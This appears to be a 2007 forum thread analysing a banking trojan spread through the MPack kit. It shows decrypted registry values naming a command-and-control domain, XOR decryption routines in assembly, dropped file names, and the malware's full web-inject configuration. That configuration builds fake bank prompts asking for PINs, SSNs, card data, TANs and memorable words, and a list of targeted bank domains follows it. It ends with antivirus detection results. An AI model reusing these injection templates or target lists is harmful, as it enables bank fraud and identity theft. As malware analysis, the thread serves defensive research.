MPack Malware Sample
Here is an example of the new Mpack malware that has been gaining momentum recently. Mpack gained notoriety as it is a commercial tool being distributed for pay. It is purported to attack the MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow, WinZip ActiveX Overflow, QuickTime Overflow overflows. SANS ISC and Verisign/iDefense have an email that has been circulating about this. The further commercialization of malware is continuing on both sides of the confrontation.
this is just another variant
this is just another variant of infostealer.banker.d
http://www.symantec.com/security_response/writeup.jsp?docid=2007-052710-0541-99&tabid=2
here's some additional info on this special case:
the crypted info in the registry:
[HKEY_LOCAL_MACHINE\SOFTWARE\Helper]
"Dom"=hex:1d,03,0e,1a,07,11,05,07,16,1d,18,14,13,19,4e,4e,41
"DName"="HDZ♣OGG"
"GUID"="l$'RSS#TU:/UT&:#q.q:..V!:V!.$/R.VVTR'j"
is the following:
Dom= relaxrent.info/lim
DName = cimm.dll
GUID = {3644117A-821A-4cc4-ADD5-226A6694F722}
;DLL regkey-decrypter
MOV DWORD PTR SS:[EBP-0x4],EBX <--- ebx = crypted buffer
SUB DWORD PTR SS:[EBP-0x4],ESI <--- esi = decrypted buffer
L002:
MOV EAX,EDI
MOV EBX,0xFF
CDQ
IDIV EBX
MOV EAX,DWORD PTR SS:[EBP-0x4]
LEA ECX,DWORD PTR DS:[EDI+ESI]
MOV AL,BYTE PTR DS:[EAX+ECX]
XOR AL,DL <--- decrypt crypted byte with current edi value
INC EDI
CMP EDI,DWORD PTR SS:[EBP-0x8]
MOV BYTE PTR DS:[ECX],AL
JB L002
;DOM regkey-decrypter
; at address 0x20009d5c
; e.g. decrypts relaxrent.info/lim
PUSH 0x1
LEA EAX,DWORD PTR DS:[ESI+0x1]
POP EDX
SUB EDX,ESI
L004:
XOR BYTE PTR DS:[EAX-0x1],0x2B
XOR BYTE PTR DS:[EAX],0x36
XOR BYTE PTR DS:[EAX+0x1],0x20
ADD EAX,0x3
ADD ECX,0x3
LEA EBX,DWORD PTR DS:[EDX+EAX]
CMP EBX,EDI
JB L004
;DNAME-regkey decrypter
MOV ECX,DWORD PTR SS:[EBP+0x8] <--- string c:\windows\system32\cimm.dll
LEA EAX,DWORD PTR SS:[EBP-0x88] <--- crypted registry buffer
SUB EAX,ECX
MOV ESI,EDX
L004:
MOV DL,BYTE PTR DS:[EAX+ECX]
XOR DL,0x2B <--- decryption with 0x2b
MOV BYTE PTR DS:[ECX],DL
INC ECX
DEC ESI
JNZ L004
the code which steals the whole protected storage data, is completely copied
from this PoC:
Protected Storage
By Hirosh Joseph
http://www.codeproject.com/tools/HirPStorage.asp?df=100&forumid=33951&exp=0&select=985672
as well as the deflate.c for zipping stolen data:
http://www.cs.toronto.edu/~cosmin/pngtech/src/deflate/deflate.cinjects xml code into internet banking sites
The threat drops 5 files.
system32\alog.txt
system32\cimm.dll
system32\cookie.dat
system32\ps.dat
system32\help.txt
You must now"
what="
enter your password to prevent fraud.
Your password:
Now please
">
"
what="
ATM PIN:
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
"
what="
To prevent fraud enter your credit card information please:
Your ATM or Check Card Number:
Expiration Date:
(e.g. 07.2007)
ATM PIN:
Your mother's maiden name:
"
block="sign-on."
check="pin"
quan="4"
content="d"
>
"
what="
To prevent fraud enter your credit card information please:
Your ATM or Check Card Number:
Expiration Date (e.g. 07.2007)
CVV:
ATM PIN:
"
check="citipin"
>
"
what="
4. PIN:
"
block="Sign On"
check="pin"
quan="4"
content="d"
>
"
what="
Your ATM or Check Card Number:
"
check="ccnom"
>
"
what="
ATM PIN:
SSN:
"
block="LOG ON"
check="j_ssn"
quan="9"
content="d"
>
"
what="
To prevent fraud enter your email address:
Email:
"
check="email"
>
"
what="
"
check="answ2"
>
"
what="
Date Of Birth (mm/dd/yyyy):
Social Security number /SSN (xxxxxxxxx):
ATM PIN:
"
check="yssn"
>
Visa"
what="
Date Of Birth (mm/dd/yyyy):
Social Security number /SSN (xxxxxxxxx):
ATM PIN:
"
check="yatmpin"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
">
"
what="
What is your favourite meal or restaurant?
The name of a memorable place to you?
Your favourite film of all time?
Your favourite book of all time?
Your favourite teacher or subject?
Your favourite TV star or show?
"
check="pswd"
>
"
what="
SSN:
MMN:
"
check="SSN"
>
"
what="
SSN:
MMN:
"
check="MMN"
>
"
what="
Firma
"
check="firma"
>
"
what="
Signature
"
check="efirma"
>
"
what="
Codice di Autorizzazione
"
check="efirma"
>
"
what="
password
"
check="PASSWD"
>
"
what="
Parola Chiave:
"
check="parola"
>
"
what="
Clave de firma:
"
check="firma"
>
"
what="
2*. Firma
"
check="firma"
>
"
what="
Clave de firma:
"
check="FIRMA"
>
"
what="
password dispositiva
"
check="passdeposit"
>
"
what=" Primo codice segreto
Secondo codice segreto
"
check="secondcod"
>
"
what="
P.I.N.
"
check="PIN"
>
"
what="
Password dispositiva
"
check="PASSDEP"
>
"
what="
Codice Dispositivo:
"
check="CodDep"
>
"
what="Codice OPERATIVO
"
check="codoperat"
>
"
what="
Secret answers for payment procession (question not displayed for security reasons).
Secret answer 1*
Secret answer 2*
"
check="answ2"
>
"
what="Clave de firma:
"
check="efirma"
>
"
what="
Clave de firma:
"
check="some"
>
"
what="
Ihres 6-stelligen DiBa-Keys
"
block="alt=anmelden"
check="KEYS"
content="d"
quan="6"
>
"
what="Clave de Operaciones
"
>
"
what="
Password
"
block="id=NextButton_button"
check="password"
>
"
what="
Password
"
block="id=NextButton_imageButton"
check="password"
>
"
what="
Memorable word
"
block="Sign in"
check="memword"
>
"
what="
Memorable Word
"
check="Memword"
>
"
what="
Memorable word
"
check="MEMWORD"
>
"
what="
memorable word
"
check="memword"
>
"
what="Memorable word
"
block="Next"
check="memo"
>
"
what="
Memorable word:
"
block="Next"
check="memmword"
>
"
what="
memorable year:
mother's maiden name:
"
check="MaidenName"
>
"
what="
Memorable Information
"
check="memword"
block="name=Logon"
>
"
what="
Your Date Of Birth e.g. 01/01/82
Your Password
"
check="pswd"
>
"
what="
Please enter your memorable word
"
check="memword"
block="name=loginButton"
>
"
what="
Passnumber*:
*
For security reasons, we will ask you both your full Passnumber and separate digits of it. This measure was introduced to prevent fraud.
"
check="passnumber"
block="Sign On Now"
>
"
what="
Memorable Information
"
check="memword"
block="alt=Next"
>
"
what="Please enter your password
"
check="password"
block="proceed"
>
"
what="
TAN:
"
>
"
what="
TAN:
"
>
"
what="
TAN:
"
>
"
what="
TAN :
"
>
"
what="
TAN:
"
>
"
what="
TAN:"
>
"
what="
Clave de Firma:
"
check="firma"
>
"
what="
Clave de Firma:
"
check="firma"
>
.ie
.ca
.co.uk
bankofamerica.com
barclays.com
abnamro-treasury.com
itl.net
coutts.com
ftbni.com
flemings.com
pb.grindlazs.com
hsbcib.com
hsbcgroup.com
worldserver.pipex.com/nationwide/
molb.com
scotiabank.com
hambrosbank.com
nolb.com
nationet.com
nwolb.com
natwest.com
rbsdigital.com
if.com
firstdirect.com
my.if.com
rbsdigital.com
online-offshore.lloydstsb.com
iblogin.com
myspace
Any idea how to decrypt the
Any idea how to decrypt the help.txt encrypted file?
Thanks.
Virustotal results
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 TR/Drop.BHO.H
Authentium 4.93.8 06.21.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.20.2007 PSW.Banker3.OXA
BitDefender 7.2 06.21.2007 no virus found
CAT-QuickHeal 9.00 06.21.2007 no virus found
ClamAV devel-20070416 06.21.2007 no virus found
DrWeb 4.33 06.20.2007 no virus found
eSafe 7.0.15.0 06.20.2007 no virus found
eTrust-Vet 30.8.3730 06.20.2007 no virus found
Ewido 4.0 06.20.2007 Logger.Banker.cnx
FileAdvisor 1 06.21.2007 Not analyzed yet
Fortinet 2.91.0.0 06.21.2007 no virus found
F-Prot 4.3.2.48 06.21.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Trojan-Spy.Win32.Banker.cpv
Ikarus T3.1.1.8 06.21.2007 MemScanTrojan.Spy.Banker.CNQ
Kaspersky 4.0.2.24 06.21.2007 Trojan-Spy.Win32.Banker.cpv
McAfee 5057 06.20.2007 no virus found
Microsoft 1.2607 06.21.2007 no virus found
NOD32v2 2342 06.21.2007 probably a variant of Win32/Spy.Banker.CKW
Norman 5.80.02 06.20.2007 W32/Malware.WGF
Panda 9.0.0.4 06.20.2007 Suspicious file
Prevx1 V2 06.21.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/Behav-112
Sunbelt 2.2.907.0 06.16.2007 Trojan.Nethell
Symantec 10 06.21.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.20.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 Trojan.Drop.BHO.H